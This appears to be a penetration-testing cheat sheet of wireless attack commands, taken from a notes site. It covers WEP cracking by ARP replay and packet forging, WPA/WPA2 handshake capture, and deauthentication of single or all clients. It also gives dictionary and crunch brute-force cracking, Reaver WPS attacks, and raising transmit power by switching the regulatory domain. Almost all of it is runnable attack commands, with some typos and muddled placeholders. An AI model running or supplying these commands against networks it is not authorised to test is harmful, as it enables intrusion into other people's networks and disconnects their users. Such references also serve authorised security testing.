802-11 Wireless

Getting Started

Confirming Airmon-ng Status

Airmon-ng check kill

Enter monitor mode

Airmon-ng start wlan#

Capture packets from a specific channel

Airdump-ng mon0 --channel #

Save airodump capture to file

Airodump-ng -w filename mon0 --channel 6

Generate wireless traffic via injecting packets to quickly gather the IVs

Aireplay-ng -1 0 -e SSID -a SSID MAC -h MAC mon0

  • -1 tells aireplay-ng to fake autentication

  • 0 is the retransmission time

  • -e the sssid of access point

  • -a mac address of ssid

  • -h your mac address - check adapter

  • Mon0 - interface to use for fake auth

Generating Ivs w/ the ARP Request Replay Attack

Aireplay-ng -3 -b SSID MAC -h MAC mon0

  • -3 performs arp replay attack

WPA2

To crack WPA2 wifi we must capture the 4 way handshake. To learn more about the 4 way handshake.

https://www.wifi-professionals.com/2019/01/4-way-handshake

Airodump-ng -c 6 --bssid ssid-mac -w handshake mon0

  • -c channel to use

  • --bssid = ssid of wifi

  • -w write file to filename

To force a client to reauthenticate so we can capture the handshake use the following

Aireplay-ng -0 1 -a SSID MAC -c client MAC mon0

  • -0 means deauth

  • 1 - how many deauth packets to send

Once you have enough handshakes captured you can run the cap file agaist a wordlist to crack the phrase

Aircrack-ng -w passwordlist.txt -b SSID MAC filename*.cap

WEP

airmon-ng start wlan0 <AP Channel>

airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon

aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <Attacker MAC> wlan0mon

aireplay-ng -3 -b <AP MAC> -h <Attacker MAC> wlan0mon

ARP Replay

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> wlan0mon

aircrack-ng -0 <filename.cap>

airmon-ng start wlan0 <AP Channel>

airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon

aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <Attacker MAC> wlan0mon

aireplay-ng -5 -b <AP MAC> -h <Attacker MAC> wlan0mon

packetforge-ng -0 -a <AP MAC> -h <Attacker MAC> -l <Source IP> -k <Dest IP> -y <xor filename> -w <packet filename>

tcpdump -n -vvv -e -s0 -r <packet filename>

aireplay-ng -2 -r <packet filename> wlan0mon

aircrack-ng -0 <filename>

WPA PSK

airmon-ng start wlan0 <AP Channel>

airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon

aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0mon

aircrack-ng -0 -w <wordlist> <capture file>

You can capture the handshake passively (it takes time) or de-authenticate a client.

De-authentication attack

aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0

Deauth every client

aireplay-ng -0 5 -a <bssid> mon0

Dictionary Attack

aircrack-ng -w passwords.lst capture-01.cap

Brute force Attack

crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap

CoWPAtty Attack

Wordlist mode:

cowpatty -r <Capture file> -f <wordlist> -2 -s <AP ESSID>

PMK mode:

genpmk -f <wordlist> -d <hash filename> -s <AP ESSID>

cowpatty -r <Capture file> -d <hash filename> -2 -s <AP ESSID>

Rogue Access Point Testing

--------------------------

# ifconfig wlan0 down

# iw reg set BO

# iwconfig wlan0 txpower 0

# ifconfig wlan0 up

# airmon-ng start wlan0

# airodump-ng --write capture mon0

ifconfig wlan1 down

iw reg set BO

ifconfig wlan1 up

iwconfig wlan1 channel 13

iwconfig wlan1 txpower 30

iwconfig wlan1 rate 11M auto

Reaver

------

airmon-ng start wlan0

airodump-ng wlan0

reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv

reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1

PreviousWindowsNextEnumeration

Last updated